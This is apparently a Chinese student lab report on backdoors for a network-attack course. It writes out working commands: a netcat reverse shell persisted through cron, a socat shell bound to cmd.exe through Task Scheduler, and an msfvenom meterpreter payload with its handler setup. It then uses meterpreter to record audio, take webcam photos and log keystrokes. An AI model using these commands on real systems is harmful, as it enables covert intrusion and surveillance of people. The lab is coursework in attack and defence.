Exp2 后门原理与实践

1常用后门工具实践

1.1Windows获得Linux Shell

1.Windows：使用ipconfig指令查看本机IP：

IP为172.20.10.2

再用ncat.exe程序监听本机的4308端口：

2.Kali：使用nc指令的-e选项反向连接Windows主机的4308端口：

3.Windows下成功运行Kali的shell，运行ls指令如下：

 

1.2Linux获得Windows Shell

1.在Kali环境中使用ifconfig查看IP：

IP为192.168.183.128

2.使用nc指令监听4308端口：

 

3.在Windows下，使用ncat.exe程序的-e选项项反向连接Kali主机的4308端口：

4.Kali下可以看到Windows的命令提示，可以输入Windows命令：

 

1.3使用nc传输数据

1.Windows下监听4308端口：

2.Kali下连接到Windows的4308端口：

3.建立连接之后，就可以传输数据了：

 

2.实验内容

2.1使用netcat获取主机操作Shell，cron启动

1.在Windows系统下，监听4308端口：

2.man crontab查看用法

3.用crontab -e指令编辑一条定时任务,用i进行修改，在最后一行添加25 * * * * /bin/netcat 172.20.10.2 -e /bin/sh，意思是在每个小时的第25分钟反向连接Windows主机的4308端口，修改完成按esc退出修改模式，再输入：wq保存修改结果并退出

4.用crontab -l指令查看修改结果

 5.当时间到了21:25时，此时已经获得了Kali的shell，可以输入指令：

 

2.2使用socat获取主机操作Shell, 任务计划启动

预备知识：

socat是ncat的增强版，它使用的格式是socat [options]，其中两个address是必选项，而options 是可选项。 socat的基本功能就是建立两个双向的字节流，数据就在其间传输，参数address就是代表了其中的一个方向。所谓流，代表了数据的流向，而数据则可以有许多不同的类型，命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

实践过程：

1.在win10系统下，右击屏幕左下角windows搜索图标，搜索“计划任务”。

在任务计划程序创建任务，填写任务名称，并新建一个触发器。

 

 

 

2.在操作->程序或脚本中选择socat.exe文件的路径，在添加参数一栏填写tcp-listen:4308 exec:cmd.exe,pty,stderr，这个命令的作用是把cmd.exe绑定到端口4308，同时把cmd.exe的stderr重定向到stdout上：

 

3.创建完成之后，按Windows+L快捷键锁定计算机，再次打开时，可以发现之前创建的任务已经开始运行：

4.此时，在Kali环境下输入指令socat - tcp:172.20.10.2:4308，这里的第一个参数-代表标准的输入输出，第二个流连接到Windows主机的4308端口，此时可以发现已经成功获得了一个cmd shell：

 

2.3使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

1.输入指令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.183.128 LPORT=4308 -f exe > 20164308_backdoor.exe

生成后门程序：

 

2.通过nc指令将生成的后门程序传送到Windows主机上：

3.在Kali上使用msfconsole指令进入msf控制台，使用监听模块，设置payload，设置反弹回连的IP和端口：

 

use exploit/multi/handler：进入handler模式

set payload windows/meterpreter/reverse_tcp：设置payload

set LHOST 192.168.18.128：设置LHOST

set LPORT 5236：设置LPORT

4.设置完成后，执行监听：

5.运行Windows下的后门程序：

6.此时Kali上已经获得了Windows主机的连接，并且得到了远程控制的shell：

 

2.4使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

1.使用record_mic指令可以截获一段音频：

2.使用webcam_snap指令可以使用摄像头进行拍照：

效果如下：

3.使用screenshot指令可以进行截屏：

效果如下：

4.使用keyscan_start指令开始记录下击键的过程，使用keyscan_dump指令读取击键的记录：

5.查看当前用户

6.尝试提权，提权失败

点击exit退出后，将后门用win的管理者方式打开，再以exploit进入，进行提权，提权成功

  

3基础问题回答

3.1例举你能想到的一个后门进入到你系统中的可能方式？

可以通过钓鱼网站、欺诈链接、邮箱接口、在非官方网站上下载软件时捆绑运行等多渠道的形式，趁人们没有戒防之心时，诱使用户点击。

3.2例举你知道的后门如何启动起来(win及linux)的方式？

非法用户进行远程控制、伪装成正常安全的图标诱使用户、Linux可以使用cron启动。

3.3Meterpreter有哪些给你映像深刻的功能？

印象最深刻最为震惊的是他的实时拍照、录像、录音的功能，还有截屏，这类功能威胁到个人的隐私，一旦经非法人员利用很有可能对用户照成巨大的伤害和损失，严重的会对国家安全造成威胁。

3.4如何发现自己有系统有没有被安装后门？

利用一些杀毒软件，在实验过程中，我忘记关闭360杀毒软件，结果后门直接被当做木马直接处理了，随后我把360杀毒软件关了，并把后门恢复出来才能继续运行，所以安装一些保卫软件还是有必要的。

4实验所遇问题

在实验过程中使用exploit命令后产生的提示，无法通过这个端口进行监听。

后来经过向同学请教之后发现，我对该步骤的理解出现了偏差，将LHOST设置为win的ip，随后认真地学习理解这一段的实验内容，并改正为虚拟机的ip，便能顺利进行实验。

5实验总结与体会

在这次实验中，我更加直观地感觉到了网络对抗这门课程的重要性，尤其是当我做到利用Meterpreter进行攻击拍摄时，顿时感觉惶恐，要是有天我在用电脑时，突然摄像头的指示灯亮了......这个实验只是利用了ncat这个小程序就能做到这么多的攻击，要是不法分子更加深入的学习网络攻击之后，想必网络空间将会变得更加不安全，因此我们应该更加努力学习怎样抵抗，保护好我们自己的电脑。